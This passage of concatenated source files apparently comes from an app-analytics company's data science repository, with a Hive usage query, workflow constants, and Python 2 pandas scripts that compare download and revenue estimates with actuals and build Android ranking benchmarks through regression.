max(dgm.device_type_snapshot) as device_type,
coalesce(sum(fam.domestic_mobile_bytes) / 1073741824, 0) as domestic_mobile_gb,
coalesce(sum(fam.roaming_mobile_bytes) / 1073741824, 0) as roaming_mobile_gb,
coalesce(sum(fam.domestic_wifi_bytes) / 1073741824, 0) as domestic_wifi_gb,
coalesce(sum(fam.roaming_wifi_bytes) / 1073741824, 0) as roaming_wifi_gb,
(
coalesce(sum(fam.domestic_mobile_bytes), 0) +
coalesce(sum(fam.roaming_mobile_bytes), 0) +
coalesce(sum(fam.domestic_wifi_bytes), 0) +
coalesce(sum(fam.roaming_wifi_bytes), 0)
) / 1073741824 as total_gb
from
edw.fact_app_weekly fam
join edw.dim_guid_weekly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150419
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and fam.reported_data_usage
and dgm.days_with_records >= 5
group by
utc_date_key,
guid_key
order by
total_gb desc
;
<file_sep>/aa_au_model/hive_scripts/workflow/module/constants.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
ONE_MONTH = 24 * 60 * 60 * 30
ONE_DAY = 24 * 60 * 60
class Status(object):
FAILED = 0
SUCCESS = 1
RUNNING = 2
# TO_BE_KILLED = 3
WONT_RUN = 4
class ErrorNumber(object):
WORKFLOW_NOT_EXIST = 100001
NODE_IS_NOT_A_TASK = 100002
RUNNING_ERROR = 100003
TASK_IS_RUNNING = 100004
WORKFLOW_IS_RUNNING = 100005
STATUS_LABEL = {
Status.FAILED: 'FAILED',
Status.RUNNING: 'RUNNING',
Status.SUCCESS: 'SUCCESS'
}
SCHEMA_PATH_MAPPING = {
'_o': 'oss',
'_d': 'dimension',
'_f': 'fact',
'_p': 'migration',
'_i': 'interface',
'_m': 'maintenance'
}
<file_sep>/evaluation/py/compare_model_estimates.py
'''
Created on Jul 2, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
from internal import stores_dict
import psycopg2
from pandas.io import sql
pd.set_option('use_inf_as_null', True)
def get_app_names(df, platform):
if platform == 'ios':
conn = psycopg2.connect("dbname=aa user=aa host=nile")
app_ids = df['app_id'].values
query = 'SELECT id as app_id, name as app_name FROM aa_app WHERE id in (%s)'%','.join(str(x) for x in app_ids)
elif platform == 'android':
conn = psycopg2.connect("dbname=aa_android user=aa host=nile")
app_ids = df.apply(lambda x: "'%s'"%x['app_id'], axis=1).values
query = 'SELECT class as app_id, name as app_name FROM app WHERE class in (%s)'%','.join(str(x) for x in app_ids)
app_names = sql.frame_query(query, con=conn)
df = df.merge(app_names, on='app_id', how='left')
conn.close()
return df
def get_actuals(df, file):
actuals = pd.read_csv(file)
df = df.merge(actuals, on=['app_id','date'], how='left')
return df
if __name__ == '__main__':
months = ['2013-03', '2013-04', '2013-05']
models = ['monthly', 'weekly', 'webui_preview', 'webui_final']
estimate_names = ['estimate_monthly', 'estimate_weekly', 'estimate_webui_preview', 'estimate_webui_final']
devices = ['android', 'ios']
store_ids = [10,9,7,27,3,143441,143465,143466,143462,143444]
unit_types = ['Downloads', 'USD']
files = {}
for (dirpath, dirnames, filenames) in os.walk('../data'):
for filename in filenames:
metadata = dirpath.split('/')
if 'est_daily_sbe' in metadata:
filepath = os.sep.join([dirpath, filename])
try:
files[filename]
except:
files[filename] = []
files[filename].append(filepath)
print files
result = []
for k, v in files.iteritems():
first = True
dfs = pd.DataFrame()
for filepath in v:
df = None
metadata = filepath.split('/')
device = metadata[2].split('_')[0]
model = '_'.join(metadata[2].split('_')[1:])
month = metadata[3]
store_id = int(metadata[5].split('_')[0])
unit_type = metadata[5].split('_')[1]
if device not in devices:
continue
if month not in months:
continue
if model not in models:
continue
if unit_type not in unit_types:
continue
if store_id not in store_ids:
continue
df = pd.read_csv(filepath)
print filepath
if unit_type=='Downloads':
df['estimate']=np.int64(df['estimate'])
df.rename(columns={'estimate': 'estimate_%s'%model}, inplace=True)
if first:
dfs = df.copy()
first = False
else:
dfs = dfs.merge(df, on=['app_id', 'date'], how='inner')
df = None
if dfs.shape[0]<1:
continue
filepath = filepath.replace('est_daily_sbe', 'real_daily_raw')
dfs = get_actuals(dfs, filepath)
total_actuals = dfs[dfs['units']>=0].groupby('app_id').size().reset_index()
total_actuals.rename(columns={0:'app_actuals_count'}, inplace=True)
dfs = dfs.groupby('app_id').sum().reset_index()
dfs = dfs.merge(total_actuals, on='app_id', how='left')
dfs = dfs.sort('estimate_monthly', ascending=False)
dfs['units'][dfs['app_actuals_count']<dfs['app_actuals_count'].max()]=None
for model in models:
#dfs[dfs['app_actuals_count']<dfs['app_actuals_count'].max()]['%s_absolute_error'%model] = None
dfs['%s_absolute_error'%model] = (dfs['units']-dfs['estimate_%s'%model]).abs()
dfs['%s_relative_error'%model] = dfs['%s_absolute_error'%model]*1.0/dfs['units']
if model=='monthly':
continue
dfs['monthly-%s_absolute_difference'%model] = (dfs['estimate_monthly']-dfs['estimate_%s'%model]).abs()
dfs['monthly-%s_relative_difference'%model] = dfs['monthly-%s_absolute_difference'%model]*1.0/dfs['estimate_monthly']
country_name = stores_dict.ios['country_dict'][store_id] if device=='ios' else stores_dict.android['country_dict'][store_id]
dfs = get_app_names(dfs,device)
dfs.to_csv('../data/compare_models/%s_%s_%s'%(country_name, device, k), index=False)
#dfs = dfs[(dfs['app_actuals_count']==dfs['app_actuals_count'].max()) | (pd.isnull(dfs['app_actuals_count']))]
dfs = dfs.drop('app_id', axis=1)
app_count = dfs.shape[0]
ranges = [20,200,1000,5000,10000, app_count]
res = []
mean_columns = {}
max_columns = {}
for column in dfs.columns:
mean_columns[column] = 'average_%s'%column
max_columns[column] = 'max_%s'%column
for range in ranges:
df = pd.DataFrame(dfs[:range].mean()).T
df.rename(columns=mean_columns, inplace=True)
df2 = pd.DataFrame(dfs[:range].max()).T
df2.rename(columns=max_columns, inplace=True)
df = pd.concat([df,df2], axis=1)
df['estimate_monthly_is_zero_count'] = dfs[dfs['estimate_monthly']==0].shape[0]
if range == app_count:
df['range'] = 'All'
else:
df['range'] = 'Top_%s'%range
df['units_count'] = dfs[:range][dfs['units']>=0].shape[0]
res.append(df)
res = pd.concat(res)
res['app_count'] = app_count
res['device'] = device
res['month'] = month
res['unit'] = unit_type
res['store_id'] = store_id
res['country'] = country_name
result.append(res)
result=pd.concat(result)
result.to_csv('../data/compare_models/result.csv',index=False)
<file_sep>/ranking_change/impact_finder.py
'''
Created on Aug 17, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import config
from sklearn import linear_model
import sklearn
import psycopg2
import datetime
import csv
from sklearn import cluster
import matplotlib.pyplot as plt
import pylab as pl
import scipy
MASTER_DATE = '2013-08-12'
DELTA_DAYS = 2
MAX_RANK = 100
REG_DAYS = 5
GET_RAW_DATA = True
MAKE_P_VALUES = True
MAKE_DIFFERENTIALS = True
metadata_f = '/Users/perezrafael/appannie/data/debug_file_20130827.csv'
def filter_df(df):
df = df[df['Rank']<=MAX_RANK]
df = df[df['Market']=='iPhone']
df = df[df['Type']=='Free']
return df
delta_features = set([
'Revenue', 'Downloads',
'Total IAP Download Units', 'Total IAP Revenue',
'Total App Download Units',
'Average Revenue Per IAP Transaction',
'% revenue on IAP items where IAP price is <= $2',
'% revenue on IAP items where IAP price is > $2',
'% revenue on IAP items where IAP price is > $5',
'% revenue on IAP items where IAP price is > $10',
'% revenue on IAP items where IAP price is > $20',
'% revenue on IAP items where IAP price is > $40',
'% revenue on IAP items where IAP price is > $80',
'IAP Refunds ($)',
'IAP Refunds (units)', 'IAP Promotions ($)',
'IAP Promotions (units)', 'Paid Refunds ($)',
'Paid Refunds (units)', 'Paid Promotions ($)',
'Paid Promotions (units)', '# App Updates'])
IAP_predictors = ['% revenue on IAP items where IAP price is <= $2',
'% revenue on IAP items where IAP price is > $2',
'% revenue on IAP items where IAP price is > $5',
'% revenue on IAP items where IAP price is > $10',
'% revenue on IAP items where IAP price is > $20',
'% revenue on IAP items where IAP price is > $40',
'% revenue on IAP items where IAP price is > $80',
'% IAP revenues coming from subscription', 'IAP Refunds ($)',
'IAP Refunds (units)', 'IAP Promotions ($)',
'IAP Promotions (units)']
NON_PREDICTORS = set(['Rank', 'Rank_delta', 'Date',
'App ID', 'Country', 'Category',
'Market', 'Type', 'App Name',
'Main Category', 'Publisher ID',
'Publisher Name', 'Release Date',
'App Name', 'Has IAP', 'IS Universal',
'Weekday'])
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
CONN = None
def get_connection():
global CONN
if CONN is None:
CONN = psycopg2.connect('dbname=aa_staging_small user=aa host=nile')
return CONN
def read_sales(date, store_id, value_type, table_name, app_ids=None):
conn = get_connection()
cur = conn.cursor()
if app_ids is None:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
else:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s and app_id in (%s)' % (value_type, table_name, ','.join(map(str, app_ids)))
params = (date, store_id)
cur.execute(sql, params)
print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'App ID': app_id, 'Value': value}
cur.close()
def train_test_models(df, split, predictors, target, days):
df = df.groupby(['Country', 'Category', 'Market', 'Type', 'App ID'])
#models = {}
#print predictors
result = []
for n, g in df:
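        # SelectFpr(f_regression) is used here only to obtain per-predictor
        # univariate F-scores and p-values against the target over the last
        # `days` observations; no feature subset is actually selected.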
algorithm = sklearn.feature_selection.SelectFpr(sklearn.feature_selection.f_regression)
try:
model = algorithm.fit(g[g['Date']<=split][-days:][predictors], g[g['Date']<=split][-days:][target])
#model = algorithm.fit(g[g['Date']<[split][predictors], g[g['Date']==split][target])
        except Exception:
            continue
for predictor, score, p_value in zip(predictors, model.scores_, model.pvalues_):
print str((predictor, score, p_value))
g[predictor] = p_value
del g['Date']
del g['Rank']
del g[target]
g = g.drop_duplicates()
g['Date'] = split
result.append(g)
result = pd.concat(result)
return result
def make_date_range(start_date_inclusive, end_date_inclusive):
assert start_date_inclusive <= end_date_inclusive
def create():
d = start_date_inclusive
while d <= end_date_inclusive:
yield d
d = d + datetime.timedelta(1)
return tuple(create())
def get_delta(df, columns, days):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type', 'App ID'])
result=[]
for n,g in dfs:
g = g.sort('Date', ascending=True)
for column in columns:
for day in range(1, days):
rolling_mean = pd.stats.moments.rolling_mean(g[column].shift(),day)*1.0
g['%s_delta_%s'%(column, day)] = (g[column]-rolling_mean)/rolling_mean
g['%s_delta_%s'%(column, day)] = g['%s_delta_%s'%(column, day)].fillna(0)
result.append(g)
result = pd.concat(result)
return result
def get_rolling_sum(df, columns, days):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type', 'App ID'])
result=[]
for n,g in dfs:
g = g.sort('Date', ascending=True)
for column in columns:
g['rolling_sum_%s_days_%s'%(days, column)] = pd.stats.moments.rolling_sum(g[column], days)
result.append(g)
result = pd.concat(result)
return result
def get_rolling_sum_b(df, columns, days):
dfs = df.groupby(['App ID'])
result=[]
for n,g in dfs:
g = g.sort('Date', ascending=True)
for column in columns:
g['%s_rolling_sum_%s_days'%(column, days)] = pd.stats.moments.rolling_sum(g[column], days)
result.append(g)
result = pd.concat(result)
return result
def compare_weekdays(df, group_by):
result = []
gb_date = list(group_by)
gb_date.append('Date')
df = df.groupby(gb_date).mean().reset_index()
df = df.groupby(group_by)
for n, g in df:
dates = g['Date'].drop_duplicates().order()
if dates is None or dates.shape[0]<8:
continue
for date in dates:
if dates[dates<=date][-8:].shape[0]<8:
continue
g2 = None
date2 = dates[dates<=date][-8:][:1].values[0]
g2 = pd.concat([g[g['Date']==date], g[g['Date']==date2]])
g2 = g2.sort('Date', ascending=True).set_index(gb_date).diff().reset_index()[-1:]
if g2 is not None:
result.append(g2)
#for predictor in predictors:
# g[predictor][g['Date']==date] = g[g['Date']==date][predictor].values[0] - g[g['Date']==date2][predictor].values[0]
result = pd.concat(result)
#result = result.drop(['App ID', 'Main Category', 'Publisher ID'], axis=1)
result = result.set_index(gb_date)
result = result.reindex_axis(sorted(result.columns), axis=1).reset_index()
return result
def preprocess_metadata(df):
df = df[df['AVG'] == 'F']
del df['AVG']
del df['Start Date']
del df['End Date']
del df['Rank Link']
del df['Daily Estimate']
del df['Customize']
del df['Included']
del df['Value']
df['Country'] = df['Store'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['Store']
df['Category'] = df['Category'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
#del df['Category']
df['Type'] = df['Feed'].apply(lambda x: feed_type_format[x])
df['Market'] = df['Feed'].apply(lambda x: feed_market_format[x])
del df['Feed']
df.rename(columns={'Day':'Date'}, inplace=True)
return df
def cluster_apps(df, index):
columns = set(df.columns.values)
columns = list(columns.difference(set(index)))
#model = cluster.KMeans(n_clusters=12)
#model = cluster.DBSCAN(eps=0.3, min_samples=5)
#model.fit(df[columns].values)
#labels = model.labels_
#df['cluster'] = labels
distances = sklearn.metrics.pairwise.pairwise_distances(
df[columns].values,
metric=scipy.spatial.distance.correlation)
#distances = pd.DataFrame(distances)
df['Target'] = None
df['Weight'] = None
#df['distances'] = pd.Series(list(distances), dtype=np.dtype('object'))
max = np.nanmax(distances)
for i in range(df.shape[0]):
distances[i][i]= max
minindex = np.nanargmin(distances[i]) + 1
min = np.nanmin(distances[i])
df['Target'][:i+1][-1:] = df['App ID'][:minindex][-1:].values[0]
df['Weight'][:i+1][-1:] = min
return df, distances
def main():
if GET_RAW_DATA:
df = preprocess_metadata(pd.read_csv(metadata_f))
#df = filter_df(df)
#all_apps = np.int64(df['App ID'].drop_duplicates())
#sales_df = []
#downloads_df = []
#for date in make_date_range(datetime.date(2013, 7, 1), datetime.date(2013, 8, 19)):
# day_df = pd.DataFrame(list(read_sales(date, 143441, 'revenue', 'sales', all_apps)))
# day_df['Date'] = str(date)
# sales_df.append(day_df)
# day_df2 = pd.DataFrame(list(read_sales(date, 143441, 'units', 'downloads', all_apps)))
# day_df2['Date'] = str(date)
# downloads_df.append(day_df2)
#sales_df = pd.concat(sales_df)
#downloads_df = pd.concat(downloads_df)
#sales_df['Revenue'] = sales_df['Value']
#del sales_df['Value']
#downloads_df['Downloads'] = downloads_df['Value']
#del downloads_df['Value']
#sales_df = sales_df.merge(downloads_df, how='outer', on=['Date', 'App ID'])
#df = df.merge(sales_df, on=['App ID', 'Date'])
df = df.fillna(0)
#df = get_delta(df, delta_features, DELTA_DAYS)
#df = get_delta(df, ['Rank'], 2)
#df = df.replace([np.inf, -np.inf], np.nan)
#df = df.dropna(axis=1,how='all')
#df = df.fillna(0)
df.to_csv('data/impact/raw.csv', index=False)
else:
df = pd.read_csv('data/impact/raw.csv')
target = 'Rank'
if MAKE_P_VALUES:
predictors = set(df.columns.values)
predictors = predictors.difference(NON_PREDICTORS)
predictors = list(predictors)
print df[predictors]
#df[target] *= -1.0
results = []
DATES = make_date_range(datetime.date(2013, 8, 5), datetime.date(2013, 8, 19))
for date in DATES:
res = train_test_models(df, str(date), predictors, target, REG_DAYS)
results.append(res)
results = pd.concat(results)
results.to_csv('data/impact/result_raw.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
predictors.remove(target)
results = results.fillna(1.0)
results.to_csv('data/impact/result.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
else:
results = pd.read_csv('data/impact/result.csv')
app_index = ['Country', 'Category', 'Market', 'Type', 'App ID', 'App Name', 'Main Category', 'Publisher ID', 'Has IAP']
IAP_elements = [s for s in results.columns.values if "IAP" in s]
IAP_elements.remove('Has IAP')
non_app_index = list(set(results.columns).difference(set(app_index)))
non_IAP_app_index = list(set(non_app_index).difference(set(IAP_elements)))
if MAKE_DIFFERENTIALS:
differentials = compare_weekdays(results, ['Country', 'Category', 'Market', 'Type', 'Has IAP'])
differentials.to_csv('data/impact/differentials.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
app_differentials = compare_weekdays(results, app_index)
app_differentials.to_csv('data/impact/app_differentials.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
else:
differentials = pd.read_csv('data/impact/differentials.csv')
app_differentials = pd.read_csv('data/impact/app_differentials.csv')
clusters = []
app_index.append('Date')
app_index.append('Has IAP')
app_index2 = list(app_index)
app_index2.extend(IAP_elements)
ndf = app_differentials[app_differentials['Date']<'2013-08-17']
clusters = []
distances = []
master_set = ndf[['App ID']][ndf['Date']==MASTER_DATE].drop_duplicates()
ndf = ndf[ndf['App ID'].isin(master_set['App ID'])]
ndf = ndf.sort(['App ID', 'Date'])
for n, g in ndf.groupby(['Date']):
clustered, dist = cluster_apps(g, app_index)
clusters.append(clustered)
distances.append(dist)
clusters = pd.concat(clusters)
clusters.to_csv('data/impact/clustered.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
dist_dict = {}
first_pass = True
count = 0
for (n, g), d in zip(clusters.groupby(['Date']), distances):
for app_id, d2 in zip(g['App ID'], d):
if first_pass:
dist_dict[app_id] = d2.copy()
else:
dist_dict[app_id] += d2
first_pass = False
count +=1
master_set['Target'] = None
master_set['Weight'] = None
for k in dist_dict:
dist_dict[k] /= count
minindex = np.nanargmin(dist_dict[k]) + 1
min = np.nanmin(dist_dict[k])
if not np.isnan(minindex):
target = master_set['App ID'][:minindex][-1:].values[0]
master_set['Target'][master_set['App ID']==k] = target
master_set['Weight'][master_set['App ID']==k] = min
mean_p = results[results['Date']>=MASTER_DATE]
mean_p = mean_p[mean_p['Date']<'2013-08-17']
mean_p = mean_p.groupby(['App ID', 'App Name', 'Has IAP', 'Publisher Name', 'IS Universal', 'Main Category']).mean().reset_index()
#df2 = df[df['Date']==MASTER_DATE]
#df2 = df2[['App ID', 'App Name', 'Has IAP', 'Publisher Name', 'IS Universal', 'Main Category']]
graph = master_set.merge(mean_p, on=['App ID'])
app_index.remove('App ID')
app_index.append('Source')
graph.rename(columns={'App ID': 'Id', 'App Name':'Label'}, inplace=True)
#graph[['Id', 'Label', 'Has IAP', 'Publisher Name', 'IS Universal', 'Main Category']].drop_duplicates().to_csv('data/impact/nodes.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
graph.to_csv('data/impact/nodes.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
graph = graph.rename(columns={'Id': 'Source'})
graph[['Source', 'Target', 'Weight']].to_csv('data/impact/edges.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
if __name__ == '__main__':
main()
<file_sep>/betty_benchmark_android/gen_benchmark_data_android.py
##
# gen_benchmark_data_android
# Department: Data Science
# Author: <NAME>
# Create: Nov 26, 2013
# Description: Generate android benchmark data
# To Do: Change input, database paths, change output path, changes to load all store_ids, change output format to bz2, output date range
# OUTPUT FILE format: 'store_id', 'category_id', 'feed_id', 'date', 'app_id', 'actual', 'rank', 'has_event_flag', 'est'
##
#import pdb
import sys
import os
import pandas as pd
import psycopg2
import numpy as np
import datetime
import config
from sklearn.cross_validation import KFold
import bz2
import statsmodels.regression.linear_model as sm
#import matplotlib.cm as cm
#import zipfile
#import StringIO
#import datetime as dt
#import matplotlib.dates as mdates
#import itertools
import csv
#from scipy import optimize
#DB_ACTUALS_STRING = 'dbname=aa_staging_android user=aa host=nile'
#DB_EVENTS_STRING = 'dbname=aa_android user=aa host=nile'
#DB_APPID_STRING = 'dbname=aa_android user=aa host=nile'
DB_ACTUALS_STRING = 'dbname=aa_staging_android user=aa host=10.38.48.145 port=5432'
DB_EVENTS_STRING = 'dbname=aa_android user=aa host=10.38.48.134 port=6432'
DB_APPID_STRING = 'dbname=aa_android user=aa host=10.38.48.134 port=6432'
#COMPRESSED_RANKING_FILES_PATH = '/Users/antony/workspace/data/rank_files_android' if len(sys.argv) != 2 else sys.argv[1]
COMPRESSED_RANKING_FILES_PATH = '/mnt/data/android-ranks' if len(sys.argv) != 2 else sys.argv[1]
OUTPUT_FILES_PATH = '/home/antony/projects/aa/data_science/benchmark_android'
if not os.path.isdir(COMPRESSED_RANKING_FILES_PATH):
print 'Expecting compressed ranking files in directory %s' % COMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
CONN = None
def get_connection(conn_string):
global CONN
if CONN is None:
CONN = psycopg2.connect(conn_string)
return CONN
#def load_ranks_csv_zip(path):
# filehandle = open(path, 'rb')
# zfile = zipfile.ZipFile(filehandle)
# data = StringIO.StringIO(zfile.read(zfile.namelist()[0])) #don't forget this line!
# df = pd.read_csv(data)
# return df
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('Android-Ranking-')
assert filename.endswith('.csv.bz2')
filename_date_str = filename[len('Android-Ranking-'):-len('.csv.bz2')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_feed_str_filter = frozenset(map(str, config.ANDROID_FEEDS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.ANDROID_CATEGORIES_DICT.values()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
#f = open(path, 'r' )
f = bz2.BZ2File(path, 'r')
android_df = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split(',')
#print line_split
#print line
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
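        # each line is expected to look like (hypothetical values):
        #   2013-07-01,<store_shortcut>,<category_id>,<feed_id>,1-classA 2-classB
        # i.e. a date, store, category and feed field, then a space-separated
        # list of "rank-app_class" tokens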
if str(config.ANDROID_STORE_SHORTCUTS_TO_ID_DICT[ranking_store_str]) not in store_ids:
continue
if ranking_feed_str not in ranking_feed_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
store_id = str(config.ANDROID_STORE_SHORTCUTS_TO_ID_DICT[ranking_store_str])
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app', 'index':'rank'}, inplace=True)
df['rank'] = df['app'].apply(lambda x: x.split('-')[0])
df['date'] = ranking_date_str
df['store_id'] = store_id
df['category_id'] = category_id
df['feed_id'] = feed_id
df['app_class'] = df['app'].apply(lambda x: x.split('-')[1])
#df.rename(columns={'rank': 'iphone_rank'}, inplace=True)
android_df.append(df)
f.close()
android_df = pd.concat(android_df)
android_df[['app_class', 'date', 'store_id', 'category_id', 'feed_id']] = android_df[['app_class', 'date', 'store_id', 'category_id', 'feed_id']].applymap(str)
del android_df['app']
#print android_df
return android_df
def daterange(start_date, end_date):
result = []
for n in range(int ((end_date - start_date).days)):
result.append(start_date + datetime.timedelta(n))
return result
def get_appid():
conn = get_connection(DB_APPID_STRING)
cur = conn.cursor()
sql = 'SELECT class, id from app'
cur.execute(sql)
df = pd.DataFrame(list(cur))
df.rename(columns={0:'app_class', 1:'app_id'}, inplace=True)
df[['app_class', 'app_id']] = df[['app_class', 'app_id']].applymap(str)
    df = df.drop_duplicates()
return df
def get_actuals(store_id, start_d, end_d, table_name, value_type):
conn = get_connection(DB_ACTUALS_STRING)
cur = conn.cursor()
sql = 'SELECT app_class, date(date) as date, store_id, %s FROM %s WHERE date >= %%s AND date <= %%s AND store_id = %%s' % (value_type, table_name)
params = (start_d, end_d, store_id)
print('loading %s'%table_name)
cur.execute(sql, params)
result = pd.DataFrame(list(cur))
#result[['app_class', 'date', 'store_id']] = result[['app_class', 'date', 'store_id']].applymap(str)
cur.close()
    if result.empty:
        cols = ['app_class', 'date', 'store_id', table_name]
        result = pd.DataFrame(columns=cols)
    else:
        result.rename(columns={0:'app_class', 1:'date', 2:'store_id', 3: table_name}, inplace=True)
        result = result.drop_duplicates()
return result
def get_events(store_id, start_d, end_d):
conn = get_connection(DB_EVENTS_STRING)
cur = conn.cursor()
sql = 'SELECT distinct app_id, date(date) as date, store_id, type FROM event WHERE date >= %s AND date <= %s AND store_id = %s'
params = (start_d, end_d, store_id)
print('loading events')
#print cur.mogrify(sql, params)
cur.execute(sql, params)
result = pd.DataFrame(list(cur))
cur.close()
    if result.empty:
        cols = ['app_id', 'date', 'store_id', 'has_event_flag']
        result = pd.DataFrame(columns=cols)
    else:
        result.rename(columns={0:'app_id', 1:'date', 2:'store_id', 3:'type'}, inplace=True)
        del result['type']
        result['has_event_flag'] = 1
        result = result.drop_duplicates()
return result
def get_ranks(store_id, dataDates, app_class_id):
path = COMPRESSED_RANKING_FILES_PATH
category_ids = map(str, config.ANDROID_CATEGORIES_DICT.values())
ranks_df = []
for single_date in dataDates:
file = '%s/Android-Ranking-%s.csv.bz2'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, store_id, category_ids)
ranks_df.append(df)
ranks_df = pd.concat(ranks_df)
#app_class_id = get_appid()
#print app_class_id
#print app_class_id.head()
#print ranks_df
#print ranks_df.head()
ranks_df = ranks_df.merge(app_class_id, on=['app_class'], how='left')
ranks_df = ranks_df.dropna(subset=['app_id'])
    ranks_df = ranks_df.drop_duplicates()
return ranks_df
def process_store_date(df, date):
date = date.strftime("%Y-%m-%d")
#store_id = df['store_id'][0:1]
df_est = regression(df, date)
#df_obs = df[df['date'] == date]
#print '**************************'
#print df_obs.head(30).values
#pdb.set_trace()
#del df_obs['actual_log']
#del df_obs['r_log']
df_est = df_est[['store_id', 'category_id', 'feed_id', 'date', 'app_id', 'rank', 'has_event_flag', 'actual', 'est']]
#print '**************************'
#print df_est.head(30).values
#pdb.set_trace()
#df_obs = df_obs.merge(df_est, on = ['store_id', 'category_id', 'feed_id', 'date', 'app_id'], how = 'left')
#print '**************************'
#print df_obs.head(30).values
#pdb.set_trace()
#return df_obs
return df_est
def regression(df, date):
test_out = []
for n, g in df.groupby(['category_id', 'feed_id']):
print n, date
rg_group = g['rg_rank'].drop_duplicates()
app_ids = g[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
for rg_gr in rg_group:
train0 = g[((np.isnan(g['r_log']) == False) & (np.isnan(g['actual_log']) == False) & (np.isnan(g['has_event_flag']) == True))]
train0 = train0[train0['rg_rank'] == rg_gr]
test0 = g.dropna(subset = ['r_log'])
test0 = test0[test0['rg_rank'] == rg_gr]
test0 = test0[test0['date'] == date]
for tr, te in kf:
test = test0[(test0['app_id'].isin(app_ids.loc[te]['app_id']))]
train = train0[train0['app_id'].isin(app_ids.loc[tr]['app_id'])]
try:
model_ra1 = (sm.OLS.from_formula(formula ='actual_log ~ r_log', data = train))
fitted_ra1 = model_ra1.fit()
test['est'] = list(np.exp(fitted_ra1.predict(test[['r_log']])))
except Exception as e:
test['est'] = float(np.nan)
test_out.append(test)
    if not test_out:
return pd.DataFrame()
test_out = pd.concat(test_out)
return test_out
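# Illustrative sketch, never called anywhere: the per-band OLS above fits
# actual_log ~ r_log, i.e. a power law actual ~= exp(intercept) * rank**slope.
def _example_rank_power_law():
    # hypothetical toy data generated from actual = 1000 * rank**-0.8
    toy = pd.DataFrame({'rank': np.arange(1, 51)})
    toy['r_log'] = np.log(toy['rank'])
    toy['actual_log'] = np.log(1000.0 * toy['rank'] ** -0.8)
    fitted = sm.OLS.from_formula(formula='actual_log ~ r_log', data=toy).fit()
    print fitted.params           # slope ~= -0.8, exp(intercept) ~= 1000
    print np.exp(fitted.predict(toy[['r_log']]))[:5]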
def main():
global CONN
#global app_class_id
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 1)
data_start_date = start_date + datetime.timedelta(days=-6)
data_end_date = end_date
CONN = None
app_class_id = get_appid()
store_ids = map(str, config.ANDROID_STORES_DICT.keys())
#store_ids = ['12']
DATES = daterange(start_date, end_date)
dataDATES = daterange(data_start_date, data_end_date)
#print DATES
for store_id in store_ids:
        print 'country = %s' % store_id
        if int(store_id) < 45:  # skip low store ids (appears to be a manual resume point)
            continue
CONN = None
downloads_df = get_actuals(store_id, data_start_date, data_end_date, 'downloads', 'units')
sales_df = get_actuals(store_id, data_start_date, data_end_date, 'sales', 'revenue')
db_actuals = pd.merge(downloads_df, sales_df, on=['date', 'app_class', 'store_id'], how='outer')
db_actuals[['store_id']] = db_actuals[['store_id']].astype(np.int)
db_actuals[['app_class', 'date', 'store_id']] = db_actuals[['app_class', 'date', 'store_id']].applymap(str)
del sales_df
del downloads_df
CONN = None
db_events = get_events(store_id, data_start_date, data_end_date)
db_events[['store_id', 'has_event_flag']] = db_events[['store_id', 'has_event_flag']].astype(np.int)
db_events[['app_id', 'date', 'store_id']] = db_events[['app_id', 'date', 'store_id']].applymap(str)
df_ranks = get_ranks(store_id, dataDATES, app_class_id)
df_ranks[['rank']] = df_ranks[['rank']].astype(np.int)
df_ranks[['app_class', 'date', 'store_id', 'app_id']] = df_ranks[['app_class', 'date', 'store_id', 'app_id']].applymap(str)
df = df_ranks.merge(db_actuals, on=['app_class', 'store_id', 'date'], how='left')
df = df.merge(db_events, on=['app_id', 'store_id', 'date'], how = 'left')
del db_events
del db_actuals
del df_ranks
df[['feed_id']] = df[['feed_id']].astype(np.int)
df['actual'] = np.nan
df['actual'][df['feed_id'] == 0] = df['downloads'][df['feed_id'] == 0]
